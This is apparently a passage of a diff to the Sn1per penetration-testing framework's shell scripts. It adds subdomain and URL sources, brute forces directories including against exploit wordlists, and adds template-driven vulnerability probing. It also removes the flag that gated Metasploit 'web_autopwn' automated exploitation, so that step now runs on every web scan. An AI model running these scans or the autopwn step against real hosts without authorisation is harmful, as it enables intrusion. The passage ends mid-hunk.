for a in `grep "\.js" $LOOT_DIR/web/weblinks-htt*-$TARGET.txt 2> /dev/null | egrep -iv 'http' | head -n $MAX_JAVASCRIPT_FILES | cut -d\? -f1 | sort -u`; do echo "Downloading - https://$a" && FILENAME=$(echo "https://$a" | awk -F/ '{print $(NF-0)}') && curl --connect-timeout 10 --max-time 10 -s -R -L --insecure $a | js-beautify - > $FILENAME 2> /dev/null; done;
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
|
||||
echo -e "$OKRED DISPLAYING ALL JAVASCRIPT COMMENTS $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
|
||||
|
|
@ -30,4 +32,7 @@
|
|||
echo -e "$OKRED DISPLAYING JAVASCRIPT DOMAINS $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
|
||||
grep -h http $LOOT_DIR/web/javascript-linkfinder-$TARGET-*.txt 2> /dev/null | grep -v "Running " | awk '{print $1}' | egrep "http\:\/\/|https\:\/\/" | cut -d\/ -f3 | sort -u | tee $LOOT_DIR/web/javascript-$TARGET-domains.txt
|
||||
WEB_JAVASCRIPT_ANALYSIS="0"
|
||||
WEB_JAVASCRIPT_ANALYSIS="0"
|
||||
|
||||
|
||||
|
||||
|
|
|
|||
|
|
@ -113,7 +113,7 @@ cat $LOOT_DIR/nmap/nmap-$TARGET.txt $LOOT_DIR/nmap/nmap-$TARGET-*.txt 2>/dev/nul
|
|||
cat $LOOT_DIR/nmap/nmap-$TARGET.txt $LOOT_DIR/nmap/nmap-$TARGET-*.txt $LOOT_DIR/output/nmap-$TARGET-*.txt 2>/dev/null | egrep "OS details:|OS guesses:" | cut -d\: -f2 | sed 's/,//g' | head -c50 - > $LOOT_DIR/nmap/osfingerprint-$TARGET.txt 2> /dev/null
|
||||
|
||||
if [[ "$SLACK_NOTIFICATIONS_NMAP" == "1" ]]; then
|
||||
/bin/bash "$INSTALL_DIR/bin/slack.sh" postfile "$LOOT_DIR/nmap/nmap-$TARGET.txt"
|
||||
/bin/bash "$INSTALL_DIR/bin/slack.sh" postfile "$LOOT_DIR/nmap/ports-$TARGET.txt"
|
||||
fi
|
||||
|
||||
if [[ "$SLACK_NOTIFICATIONS_NMAP_DIFF" == "1" ]] && [[ -s "$LOOT_DIR/nmap/ports-$TARGET.diff" ]]; then
|
||||
|
|
@ -410,9 +410,9 @@ else
|
|||
echo -e "$OKBLUE[$RESET${OKRED}i${RESET}$OKBLUE]$OKGREEN curl --connect-timeout=5 --max-time 3 -I -s -R http://$TARGET | tee $LOOT_DIR/web/headers-http-$TARGET.txt 2> /dev/null$RESET"
|
||||
fi
|
||||
wget -qO- -T 1 --connect-timeout=5 --read-timeout=10 --tries=1 http://$TARGET | perl -l -0777 -ne 'print $1 if /<title.*?>\s*(.*?)\s*<\/title/si' >> $LOOT_DIR/web/title-http-$TARGET.txt 2> /dev/null
|
||||
curl --connect-timeout 5 --max-time 10 -I -s -R http://$TARGET | tee $LOOT_DIR/web/headers-http-$TARGET.txt 2> /dev/null
|
||||
curl --connect-timeout 5 -s -R -L http://$TARGET > $LOOT_DIR/web/websource-http-$TARGET.txt 2> /dev/null
|
||||
curl --connect-timeout 5 --max-time 10 -I -s -R -X OPTIONS http://$TARGET | grep Allow\: | tee $LOOT_DIR/web/http_options-$TARGET-port80.txt 2> /dev/null
|
||||
curl --connect-timeout 5 --max-time 10 -I -s --insecure -R http://$TARGET | tee $LOOT_DIR/web/headers-http-$TARGET.txt 2> /dev/null
|
||||
curl --connect-timeout 5 -s -R -L --insecure http://$TARGET > $LOOT_DIR/web/websource-http-$TARGET.txt 2> /dev/null
|
||||
curl --connect-timeout 5 --max-time 10 -I -s --insecure -R -X OPTIONS http://$TARGET | grep Allow\: | tee $LOOT_DIR/web/http_options-$TARGET-port80.txt 2> /dev/null
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
|
||||
echo -e "$OKRED DISPLAYING META GENERATOR TAGS $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
|
||||
|
|
@ -712,9 +712,9 @@ else
|
|||
echo -e "$OKBLUE[$RESET${OKRED}i${RESET}$OKBLUE]$OKGREEN curl --connect-timeout=5 --max-time 3 -I -s -R https://$TARGET | tee $LOOT_DIR/web/headers-https-$TARGET.txt 2> /dev/null$RESET"
|
||||
fi
|
||||
wget -qO- -T 1 --connect-timeout=5 --read-timeout=10 --tries=1 https://$TARGET | perl -l -0777 -ne 'print $1 if /<title.*?>\s*(.*?)\s*<\/title/si' >> $LOOT_DIR/web/title-https-$TARGET.txt 2> /dev/null
|
||||
curl --connect-timeout 5 --max-time 10 -I -s -R https://$TARGET | tee $LOOT_DIR/web/headers-https-$TARGET.txt 2> /dev/null
|
||||
curl --connect-timeout 5 -s -R -L https://$TARGET > $LOOT_DIR/web/websource-https-$TARGET.txt 2> /dev/null
|
||||
curl --connect-timeout 5 --max-time 10 -I -s -R -X OPTIONS https://$TARGET | grep Allow\: | tee $LOOT_DIR/web/http_options-$TARGET-port443.txt 2> /dev/null
|
||||
curl --connect-timeout 5 --max-time 10 -I -s --insecure -R https://$TARGET | tee $LOOT_DIR/web/headers-https-$TARGET.txt 2> /dev/null
|
||||
curl --connect-timeout 5 -s -R -L --insecure https://$TARGET > $LOOT_DIR/web/websource-https-$TARGET.txt 2> /dev/null
|
||||
curl --connect-timeout 5 --max-time 10 -I -s --insecure -R -X OPTIONS https://$TARGET | grep Allow\: | tee $LOOT_DIR/web/http_options-$TARGET-port443.txt 2> /dev/null
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
|
||||
echo -e "$OKRED DISPLAYING META GENERATOR TAGS $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
|
||||
|
|
@ -1446,6 +1446,8 @@ if [[ ${#SHELLED} -ge 5 ]]; then
|
|||
echo "$SHELLED" > $LOOT_DIR/output/shelled-$TARGET.txt 2> /dev/null
|
||||
fi
|
||||
|
||||
source modes/sc0pe.sh
|
||||
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
|
||||
echo -e "$OKRED SCAN COMPLETE! $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
|
||||
|
|
|
|||
|
|
@ -21,6 +21,12 @@ if [[ "$MODE" = "web" ]]; then
|
|||
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
|
||||
curl -sX GET "http://api.hackertarget.com/pagelinks/?q=http://$TARGET" | egrep -v "API count|no links found|input url is invalid|API count|no links found|input url is invalid" | tee $LOOT_DIR/web/hackertarget-http-$TARGET.txt 2> /dev/null
|
||||
fi
|
||||
if [[ "$GUA" == "1" ]]; then
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
|
||||
echo -e "$OKRED FETCHING GUA URLS $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
|
||||
gua2 -subs $TARGET | tee $LOOT_DIR/web/gua-$TARGET.txt 2> /dev/null
|
||||
fi
|
||||
if [[ "$BLACKWIDOW" == "1" ]]; then
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
|
||||
echo -e "$OKRED RUNNING ACTIVE WEB SPIDER & APPLICATION SCAN $RESET"
|
||||
|
|
@ -33,6 +39,7 @@ if [[ "$MODE" = "web" ]]; then
|
|||
cat $LOOT_DIR/web/waybackurls-$TARGET.txt 2> /dev/null >> $LOOT_DIR/web/spider-$TARGET.txt 2>/dev/null
|
||||
cat $LOOT_DIR/web/hackertarget-*-$TARGET.txt 2> /dev/null >> $LOOT_DIR/web/spider-$TARGET.txt 2>/dev/null
|
||||
cat $LOOT_DIR/web/passivespider-$TARGET.txt 2> /dev/null >> $LOOT_DIR/web/spider-$TARGET.txt 2>/dev/null
|
||||
cat $LOOT_DIR/web/gua-$TARGET.txt 2> /dev/null >> $LOOT_DIR/web/spider-$TARGET.txt 2>/dev/null
|
||||
sed -ir "s/</\&lh\;/g" $LOOT_DIR/web/spider-$TARGET.txt 2>/dev/null
|
||||
sort -u $LOOT_DIR/web/spider-$TARGET.txt 2>/dev/null > $LOOT_DIR/web/spider-$TARGET.sorted 2>/dev/null
|
||||
mv $LOOT_DIR/web/spider-$TARGET.sorted $LOOT_DIR/web/spider-$TARGET.txt 2>/dev/null
|
||||
|
|
@ -51,8 +58,7 @@ if [[ "$MODE" = "web" ]]; then
|
|||
echo -e "$OKRED RUNNING COMMON FILE/DIRECTORY BRUTE FORCE $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
|
||||
if [[ "$DIRSEARCH" == "1" ]]; then
|
||||
python3 $PLUGINS_DIR/dirsearch/dirsearch.py -u http://$TARGET -w $WEB_BRUTE_STEALTH -x 400,404,405,406,429,502,503,504 -F -e $WEB_BRUTE_EXTENSIONS -f -r -t $THREADS --random-agents --plain-text-report=$LOOT_DIR/web/dirsearch-$TARGET.txt 2> /dev/null > /dev/null && cat $LOOT_DIR/web/dirsearch-$TARGET.txt
|
||||
python3 $PLUGINS_DIR/dirsearch/dirsearch.py -u http://$TARGET -w $WEB_BRUTE_COMMON -x 400,404,405,406,429,502,503,504 -F -e * -t $THREADS --random-agents --plain-text-report=$LOOT_DIR/web/dirsearch-$TARGET.txt 2> /dev/null > /dev/null && cat $LOOT_DIR/web/dirsearch-$TARGET.txt
|
||||
python3 $PLUGINS_DIR/dirsearch/dirsearch.py -u http://$TARGET -w $WEB_BRUTE_COMMON -x 400,404,405,406,429,500,502,503,504 -F -e $WEB_BRUTE_EXTENSIONS -t $THREADS --random-agents --plain-text-report=$LOOT_DIR/web/dirsearch-$TARGET.txt 2> /dev/null > /dev/null && cat $LOOT_DIR/web/dirsearch-$TARGET.txt
|
||||
fi
|
||||
if [[ "$GOBUSTER" == "1" ]]; then
|
||||
gobuster -u http://$TARGET -w $WEB_BRUTE_COMMON -e | tee $LOOT_DIR/web/webbrute-$TARGET-http-common.txt
|
||||
|
|
@ -63,7 +69,7 @@ if [[ "$MODE" = "web" ]]; then
|
|||
echo -e "$OKRED RUNNING FULL FILE/DIRECTORY BRUTE FORCE $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
|
||||
if [[ "$DIRSEARCH" == "1" ]]; then
|
||||
python3 $PLUGINS_DIR/dirsearch/dirsearch.py -u http://$TARGET -w $WEB_BRUTE_FULL -x 400,404,405,406,429,502,503,504 -F -e * -t $THREADS --random-agents --plain-text-report=$LOOT_DIR/web/dirsearch-$TARGET.txt 2> /dev/null > /dev/null && cat $LOOT_DIR/web/dirsearch-$TARGET.txt
|
||||
python3 $PLUGINS_DIR/dirsearch/dirsearch.py -u http://$TARGET -w $WEB_BRUTE_FULL -x 400,404,405,406,429,500,502,503,504 -F -e "/" -t $THREADS --random-agents --plain-text-report=$LOOT_DIR/web/dirsearch-$TARGET.txt 2> /dev/null > /dev/null && cat $LOOT_DIR/web/dirsearch-$TARGET.txt
|
||||
fi
|
||||
if [[ "$GOBUSTER" == "1" ]]; then
|
||||
gobuster -u http://$TARGET -w $WEB_BRUTE_FULL -e | tee $LOOT_DIR/web/webbrute-$TARGET-http-full.txt
|
||||
|
|
@ -74,7 +80,7 @@ if [[ "$MODE" = "web" ]]; then
|
|||
echo -e "$OKRED RUNNING FILE/DIRECTORY BRUTE FORCE FOR VULNERABILITIES $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
|
||||
if [[ "$DIRSEARCH" == "1" ]]; then
|
||||
python3 $PLUGINS_DIR/dirsearch/dirsearch.py -u http://$TARGET -w $WEB_BRUTE_EXPLOITS -x 400,404,405,406,429,502,503,504 -F -e * -t $THREADS --random-agents --plain-text-report=$LOOT_DIR/web/dirsearch-$TARGET.txt 2> /dev/null > /dev/null && cat $LOOT_DIR/web/dirsearch-$TARGET.txt
|
||||
python3 $PLUGINS_DIR/dirsearch/dirsearch.py -u http://$TARGET -w $WEB_BRUTE_EXPLOITS -x 400,404,405,406,429,500,502,503,504 -F -e "/" -t $THREADS --random-agents --plain-text-report=$LOOT_DIR/web/dirsearch-$TARGET.txt 2> /dev/null > /dev/null && cat $LOOT_DIR/web/dirsearch-$TARGET.txt
|
||||
fi
|
||||
if [[ "$GOBUSTER" == "1" ]]; then
|
||||
gobuster -u http://$TARGET -w $WEB_BRUTE_EXPLOITS -e | tee $LOOT_DIR/web/webbrute-$TARGET-https-exploits.txt
|
||||
|
|
@ -145,10 +151,10 @@ if [[ "$MODE" = "web" ]]; then
|
|||
/bin/bash "$INSTALL_DIR/bin/slack.sh" "[xerosecurity.com] •?((¯°·._.• Finished Sn1per HTTP web scan: $TARGET [$MODE] (`date +"%Y-%m-%d %H:%M"`) •._.·°¯))؟•"
|
||||
echo "[xerosecurity.com] •?((¯°·._.• Finished Sn1per HTTP web scan: $TARGET [$MODE] (`date +"%Y-%m-%d %H:%M"`) •._.·°¯))؟•" >> $LOOT_DIR/scans/notifications.txt
|
||||
fi
|
||||
|
||||
cd $INSTALL_DIR
|
||||
if [[ "$METASPLOIT_EXPLOIT" == "1" ]]; then
|
||||
PORT="80"
|
||||
SSL="false"
|
||||
source modes/web_autopwn.sh
|
||||
fi
|
||||
PORT="80"
|
||||
SSL="false"
|
||||
source modes/web_autopwn.sh
|
||||
|
||||
fi
|
||||
|
|
@ -21,6 +21,12 @@ if [[ "$MODE" = "web" ]]; then
|
|||
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
|
||||
curl -sX GET "http://api.hackertarget.com/pagelinks/?q=https://$TARGET" | egrep -v "API count|no links found|input url is invalid|API count|no links found|input url is invalid" | tee $LOOT_DIR/web/hackertarget-https-$TARGET.txt 2> /dev/null
|
||||
fi
|
||||
if [[ "$GUA" == "1" ]]; then
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
|
||||
echo -e "$OKRED FETCHING GUA URLS $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
|
||||
gua2 -subs $TARGET | tee $LOOT_DIR/web/gua-$TARGET.txt 2> /dev/null
|
||||
fi
|
||||
if [[ "$BLACKWIDOW" == "1" ]]; then
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
|
||||
echo -e "$OKRED RUNNING ACTIVE WEB SPIDER & APPLICATION SCAN $RESET"
|
||||
|
|
@ -33,6 +39,7 @@ if [[ "$MODE" = "web" ]]; then
|
|||
cat $LOOT_DIR/web/waybackurls-$TARGET.txt 2> /dev/null >> $LOOT_DIR/web/spider-$TARGET.txt 2>/dev/null
|
||||
cat $LOOT_DIR/web/hackertarget-*-$TARGET.txt 2> /dev/null >> $LOOT_DIR/web/spider-$TARGET.txt 2>/dev/null
|
||||
cat $LOOT_DIR/web/passivespider-$TARGET.txt 2> /dev/null >> $LOOT_DIR/web/spider-$TARGET.txt 2>/dev/null
|
||||
cat $LOOT_DIR/web/gua-$TARGET.txt 2> /dev/null >> $LOOT_DIR/web/spider-$TARGET.txt 2>/dev/null
|
||||
sed -ir "s/</\&lh\;/g" $LOOT_DIR/web/spider-$TARGET.txt 2>/dev/null
|
||||
sort -u $LOOT_DIR/web/spider-$TARGET.txt 2>/dev/null > $LOOT_DIR/web/spider-$TARGET.sorted 2>/dev/null
|
||||
mv $LOOT_DIR/web/spider-$TARGET.sorted $LOOT_DIR/web/spider-$TARGET.txt 2>/dev/null
|
||||
|
|
@ -51,8 +58,7 @@ if [[ "$MODE" = "web" ]]; then
|
|||
echo -e "$OKRED RUNNING COMMON FILE/DIRECTORY BRUTE FORCE $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
|
||||
if [[ "$DIRSEARCH" == "1" ]]; then
|
||||
python3 $PLUGINS_DIR/dirsearch/dirsearch.py -u https://$TARGET -w $WEB_BRUTE_STEALTH -x 400,404,405,406,429,502,503,504 -F -e $WEB_BRUTE_EXTENSIONS -f -r -t $THREADS --random-agents --plain-text-report=$LOOT_DIR/web/dirsearch-$TARGET.txt 2> /dev/null > /dev/null && cat $LOOT_DIR/web/dirsearch-$TARGET.txt
|
||||
python3 $PLUGINS_DIR/dirsearch/dirsearch.py -u https://$TARGET -w $WEB_BRUTE_COMMON -x 400,404,405,406,429,502,503,504 -F -e * -t $THREADS --random-agents --plain-text-report=$LOOT_DIR/web/dirsearch-$TARGET.txt 2> /dev/null > /dev/null && cat $LOOT_DIR/web/dirsearch-$TARGET.txt
|
||||
python3 $PLUGINS_DIR/dirsearch/dirsearch.py -u https://$TARGET -w $WEB_BRUTE_COMMON -x 400,404,405,406,429,500,502,503,504 -F -e "$WEB_BRUTE_EXTENSIONS" -t $THREADS --random-agents --plain-text-report=$LOOT_DIR/web/dirsearch-$TARGET.txt 2> /dev/null > /dev/null && cat $LOOT_DIR/web/dirsearch-$TARGET.txt
|
||||
fi
|
||||
if [[ "$GOBUSTER" == "1" ]]; then
|
||||
gobuster -u https://$TARGET -w $WEB_BRUTE_COMMON -e | tee $LOOT_DIR/web/gobuster-$TARGET-https-common.txt
|
||||
|
|
@ -63,7 +69,7 @@ if [[ "$MODE" = "web" ]]; then
|
|||
echo -e "$OKRED RUNNING FULL FILE/DIRECTORY BRUTE FORCE $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
|
||||
if [[ "$DIRSEARCH" == "1" ]]; then
|
||||
python3 $PLUGINS_DIR/dirsearch/dirsearch.py -u https://$TARGET -w $WEB_BRUTE_FULL -x 400,404,405,406,429,502,503,504 -F -e * -t $THREADS --random-agents --plain-text-report=$LOOT_DIR/web/dirsearch-$TARGET.txt 2> /dev/null > /dev/null && cat $LOOT_DIR/web/dirsearch-$TARGET.txt
|
||||
python3 $PLUGINS_DIR/dirsearch/dirsearch.py -u https://$TARGET -w $WEB_BRUTE_FULL -x 400,404,405,406,429,500,502,503,504 -F -e "/" -t $THREADS --random-agents --plain-text-report=$LOOT_DIR/web/dirsearch-$TARGET.txt 2> /dev/null > /dev/null && cat $LOOT_DIR/web/dirsearch-$TARGET.txt
|
||||
fi
|
||||
if [[ "$GOBUSTER" == "1" ]]; then
|
||||
gobuster -u https://$TARGET -w $WEB_BRUTE_FULL -e | tee $LOOT_DIR/web/gobuster-$TARGET-https-full.txt
|
||||
|
|
@ -74,7 +80,7 @@ if [[ "$MODE" = "web" ]]; then
|
|||
echo -e "$OKRED RUNNING FILE/DIRECTORY BRUTE FORCE FOR VULNERABILITIES $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
|
||||
if [[ "$DIRSEARCH" == "1" ]]; then
|
||||
python3 $PLUGINS_DIR/dirsearch/dirsearch.py -u https://$TARGET -w $WEB_BRUTE_EXPLOITS -x 400,404,405,406,429,502,503,504 -F -e * -t $THREADS --random-agents --plain-text-report=$LOOT_DIR/web/dirsearch-$TARGET.txt 2> /dev/null > /dev/null && cat $LOOT_DIR/web/dirsearch-$TARGET.txt
|
||||
python3 $PLUGINS_DIR/dirsearch/dirsearch.py -u https://$TARGET -w $WEB_BRUTE_EXPLOITS -x 400,404,405,406,429,500,502,503,504 -F -e "/" -t $THREADS --random-agents --plain-text-report=$LOOT_DIR/web/dirsearch-$TARGET.txt 2> /dev/null > /dev/null && cat $LOOT_DIR/web/dirsearch-$TARGET.txt
|
||||
fi
|
||||
if [[ "$GOBUSTER" == "1" ]]; then
|
||||
gobuster -u https://$TARGET -w $WEB_BRUTE_EXPLOITS -e | tee $LOOT_DIR/web/gobuster-$TARGET-https-exploits.txt
|
||||
|
|
@ -144,10 +150,10 @@ if [[ "$MODE" = "web" ]]; then
|
|||
/bin/bash "$INSTALL_DIR/bin/slack.sh" "[xerosecurity.com] •?((¯°·._.• Finished Sn1per HTTPS web scan: $TARGET [$MODE] (`date +"%Y-%m-%d %H:%M"`) •._.·°¯))؟•"
|
||||
echo "[xerosecurity.com] •?((¯°·._.• Finished Sn1per HTTPS web scan: $TARGET [$MODE] (`date +"%Y-%m-%d %H:%M"`) •._.·°¯))؟•" >> $LOOT_DIR/scans/notifications.txt
|
||||
fi
|
||||
|
||||
cd $INSTALL_DIR
|
||||
if [[ "$METASPLOIT_EXPLOIT" == "1" ]]; then
|
||||
PORT="443"
|
||||
SSL="true"
|
||||
source modes/web_autopwn.sh
|
||||
fi
|
||||
PORT="443"
|
||||
SSL="true"
|
||||
source modes/web_autopwn.sh
|
||||
|
||||
fi
|
||||
|
|
@ -103,6 +103,12 @@ if [[ "$RECON" = "1" ]]; then
|
|||
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
|
||||
python3 /usr/share/sniper/bin/github-subdomains.py -t $GITHUB_API_TOKEN -d $TARGET $LOOT_DIR/domains/domains-$TARGET-github.txt 2> /dev/null
|
||||
fi
|
||||
if [[ "$RAPIDDNS" = "1" ]]; then
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
|
||||
echo -e "$OKRED GATHERING GITHUB SUBDOMAINS $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
|
||||
curl -s "https://rapiddns.io/subdomain/$TARGET?full=1&down=1#exportData()" | grep -Eo "(http|https)://[a-zA-Z0-9./?=_-]*" | sort -u | grep "$TARGET" | cut -d\/ -f3 2> /dev/null > $LOOT_DIR/domains/domains-$TARGET-rapiddns.txt 2> /dev/null
|
||||
fi
|
||||
cat $LOOT_DIR/domains/domains-$TARGET-crt.txt 2> /dev/null > $LOOT_DIR/domains/domains-$TARGET-presorted.txt 2> /dev/null
|
||||
cat $LOOT_DIR/domains/domains-$TARGET-spyse.txt /dev/null > $LOOT_DIR/domains/domains-$TARGET-presorted.txt 2> /dev/null
|
||||
cat $LOOT_DIR/domains/domains-$TARGET.txt 2> /dev/null >> $LOOT_DIR/domains/domains-$TARGET-presorted.txt 2> /dev/null
|
||||
|
|
@ -112,6 +118,7 @@ if [[ "$RECON" = "1" ]]; then
|
|||
cat $LOOT_DIR/domains/domains-$TARGET-censys.txt 2> /dev/null >> $LOOT_DIR/domains/domains-$TARGET-presorted.txt 2> /dev/null
|
||||
cat $LOOT_DIR/domains/domains-$TARGET-shodan-sorted.txt 2>/dev/null >> $LOOT_DIR/domains/domains-$TARGET-presorted.txt 2> /dev/null
|
||||
cat $LOOT_DIR/domains/domains-$TARGET-github.txt 2> /dev/null >> $LOOT_DIR/domains/domains-$TARGET-presorted.txt 2> /dev/null
|
||||
cat $LOOT_DIR/domains/domains-$TARGET-rapiddns.txt 2> /dev/null >> $LOOT_DIR/domains/domains-$TARGET-presorted.txt 2> /dev/null
|
||||
cat $LOOT_DIR/domains/targets.txt 2> /dev/null >> $LOOT_DIR/domains/domains-$TARGET-presorted.txt 2> /dev/null
|
||||
sed -i '/^$/d' $LOOT_DIR/domains/domains-$TARGET-presorted.txt 2> /dev/null
|
||||
sed -i '/^$/d' $LOOT_DIR/domains/domains-$TARGET.txt 2> /dev/null
|
||||
|
|
|
|||
|
|
@ -0,0 +1,11 @@
|
|||
for file in `ls $INSTALL_DIR/templates/active/*.sh 2> /dev/null`; do
|
||||
source $file
|
||||
OUTPUT_NAME=$(echo $VULN_NAME | sed -E 's/[^[:alnum:]]+/_/g')
|
||||
#echo $file
|
||||
if [[ "$SSL" == "true" ]]; then
|
||||
curl --connect-timeout 5 --max-time 10 -k -X $METHOD $CURL_OPTS "https://$TARGET:$PORT/$URI" | egrep $GREP_OPTIONS "$MATCH" $SECONDARY_COMMANDS >/tmp/match.out && echo "[+] [$SEVERITY] $VULN_NAME - URL: https://$TARGET:$PORT/$URI - EVIDENCE: $(head -n 1 /tmp/match.out | sed -r "s/</\&lh\;/g")" | tee "$LOOT_DIR/vulnerabilities/sc0pe-$TARGET-https-$OUTPUT_NAME.txt" 2> /dev/null && /bin/bash "$INSTALL_DIR/bin/slack.sh" "[xerosecurity.com] •?((¯°·._.• [+] [$SEVERITY] $VULN_NAME - URL: https://$TARGET:$PORT/$URI - EVIDENCE: $(cat /tmp/match.out) (`date +"%Y-%m-%d %H:%M"`) •._.·°¯))؟•" && echo "[xerosecurity.com] •?((¯°·._.• [+] [$SEVERITY] $VULN_NAME - URL: https://$TARGET:$PORT/$URI - EVIDENCE: $(cat /tmp/match.out | sed -r "s/</\&lh\;/g") (`date +"%Y-%m-%d %H:%M"`) •._.·°¯))؟•" >> $LOOT_DIR/scans/notifications.txt || rm -f "$LOOT_DIR/vulnerabilities/sc0pe-$TARGET-https-$OUTPUT_NAME.txt" 2> /dev/null
|
||||
else
|
||||
curl --connect-timeout 5 --max-time 10 -k -X $METHOD $CURL_OPTS "http://$TARGET:$PORT/$URI" | egrep $GREP_OPTIONS "$MATCH" $SECONDARY_COMMANDS >/tmp/match.out && echo "[+] [$SEVERITY] $VULN_NAME - URL: http://$TARGET:$PORT/$URI - EVIDENCE: $(head -n 1 /tmp/match.out | sed -r "s/</\&lh\;/g")" | tee "$LOOT_DIR/vulnerabilities/sc0pe-$TARGET-http-$OUTPUT_NAME.txt" 2> /dev/null && /bin/bash "$INSTALL_DIR/bin/slack.sh" "[xerosecurity.com] •?((¯°·._.• [+] [$SEVERITY] $VULN_NAME - URL: http://$TARGET:$PORT/$URI - EVIDENCE: $(cat /tmp/match.out) (`date +"%Y-%m-%d %H:%M"`) •._.·°¯))؟•" && echo "[xerosecurity.com] •?((¯°·._.• [+] [$SEVERITY] $VULN_NAME - URL: http://$TARGET:$PORT/$URI - EVIDENCE: $(cat /tmp/match.out | sed -r "s/</\&lh\;/g") (`date +"%Y-%m-%d %H:%M"`) •._.·°¯))؟•" >> $LOOT_DIR/scans/notifications.txt || rm -f "$LOOT_DIR/vulnerabilities/sc0pe-$TARGET-http-$OUTPUT_NAME.txt" 2> /dev/null
|
||||
fi
|
||||
rm -f /tmp/match.out 2> /dev/null
|
||||
done
|
||||
|
|
@ -0,0 +1,20 @@
|
|||
for file in `ls $INSTALL_DIR/templates/passive/*.sh 2> /dev/null`; do
|
||||
source $file
|
||||
OUTPUT_NAME=$(echo $VULN_NAME | sed -E 's/[^[:alnum:]]+/_/g')
|
||||
#echo $file
|
||||
if [[ "$SEARCH" == "negative" ]]; then
|
||||
if [[ "$SSL" == "true" ]]; then
|
||||
cat $FILENAME | egrep $GREP_OPTIONS "$MATCH" $SECONDARY_COMMANDS >/tmp/match.out || echo "[+] [$SEVERITY] $VULN_NAME - URL: https://$TARGET:$PORT - EVIDENCE: $(head -n 1 /tmp/match.out | sed -r "s/</\&lh\;/g")" | tee "$LOOT_DIR/vulnerabilities/sc0pe-$TARGET-https-$OUTPUT_NAME.txt" 2> /dev/null && /bin/bash "$INSTALL_DIR/bin/slack.sh" "[xerosecurity.com] •?((¯°·._.• [+] [$SEVERITY] $VULN_NAME - URL: https://$TARGET:$PORT/$URI - EVIDENCE: $(head -n 1 /tmp/match.out) (`date +"%Y-%m-%d %H:%M"`) •._.·°¯))؟•" && echo "[xerosecurity.com] •?((¯°·._.• [+] [$SEVERITY] $VULN_NAME - URL: https://$TARGET:$PORT/$URI - EVIDENCE: $(head -n 1 /tmp/match.out | sed -r "s/</\&lh\;/g") (`date +"%Y-%m-%d %H:%M"`) •._.·°¯))؟•" >> $LOOT_DIR/scans/notifications.txt || rm -f "$LOOT_DIR/vulnerabilities/sc0pe-$TARGET-https-$OUTPUT_NAME.txt" 2> /dev/null
|
||||
else
|
||||
